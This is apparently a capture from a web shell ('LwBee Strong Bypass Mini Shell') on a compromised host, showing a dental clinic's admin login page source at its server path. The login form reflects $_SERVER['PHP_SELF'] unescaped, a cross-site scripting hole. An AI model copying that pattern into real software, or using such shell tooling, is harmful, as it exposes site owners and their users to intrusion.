/home3/vehiclea/public_html/admin-kalyanidentalclinics-com/index.php
<?php
    include "include/functions.php";
    if(!empty($_POST['submit']))
     {
        login_table();
    }
?>
<!doctype html>
<html lang="en">
  <head>
  <link href="assets/img/icon.png" rel="icon">
  <title>KALYANI SPECIALITY DENTAL CLINIC || ADMIN</title>
  </head>
  <style>
    body{
         margin:0;
        padding:0;
        font-family:sans-serif;
        color: #E1E1E1;
        background-image:url('assets/img/loginbackground.jpg');
        background-size: cover;
        font-size: 16px;
        font-family: 'Lato', sans-serif;
        font-weight: 300;
        margin: 0;
        color: #666;
        width:100%;
    }
.box{
      
     background-color: #e0e0e0;
     width:400px;
     max-width: 440px;
     margin: 0 auto;
     position: relative;
     top: 200px;
     padding-top: 50px;
     padding-bottom: 50px;
     /*border-radius: 5px;*/
     box-shadow: 0 5px 50px rgb(0 0 0 / 40%);
     text-align: center;
     border-radius: 50px;

    }
   .box input[type = "text"],.box input[type="password"]{
       border:0;
       background:none;
       display:block;
       margin:20px auto;
       text-align:center;
       border:2px solid #3498db;
       padding:14px 10px;
       width:200px;
       outline:none;
       color:#111;
       border-radius:20px
      
   }
   .box h3{
       text-transform:uppercase;
       color:#111;
       font-weight:500;
       text-align:center;
       font-size:20px;
   }
  /* .box input[type = "text"]:focus,.box input[type="password"]:focus{
       width:280px;
       border-color:#2ecc71;
   }*/
   .box input[type="submit"]{
    border:0;
       background:none;
       display:block;
       margin:20px auto;
       text-align:center;
       border:2px solid #2ecc71;
       padding:14px 40px;
       
       outline:none;
       color:#111;
       border-radius:20px
      
   }
   .box input[type="submit"]:hover{
       background:#2ecc71;
   }
</style>

  <body>
  
    <div class="container mt-4">
        <div class="row">
              <form class="box" action="<?php echo $_SERVER['PHP_SELF']?>" method="post" onsubmit="return validation()">
             
                  <h3>Admin Login</h3>
                  <?php
                if(!empty($_GET['exist']))
                {
                ?>
                <div align="center" style="color:red;">Invalid Details</div>
                <?php
                }
                ?>
                  <input type="text" name="username" id="username" value="" placeholder="Enter Username">
                  <div class="error" id="err1" align="center" style="color:red;"></div>
                  <input type="password" name="password" id="password" value="" placeholder="Enter Password"> 
                  <div class="error" id="err2" align="center" style="color:red;"></div>
                  <input type="submit" name="submit" value="Submit">
              </form>
        </div>
    </div>

   
  </body>
</html>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.3.0/js/bootstrap-datepicker.js"></script>

<script>
    function validation(){
        if ($('#username').val() == '') {

            valid_error("username", "Enter User Name", "err1");
            return false;
        } 
        else if ($('#password').val() == '') {
             $('#err1').hide();
            valid_error("username", "Enter Password", "err2");
            return false;
        } 
        else
        {
           return true;
        }
    }

function valid_error(id, error, err) {

    $('.errr').html('');
    $('#' + err).show();

    $('#' + err).html(error);
    $('#' + id).focus();
    return false;
}
</script>
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File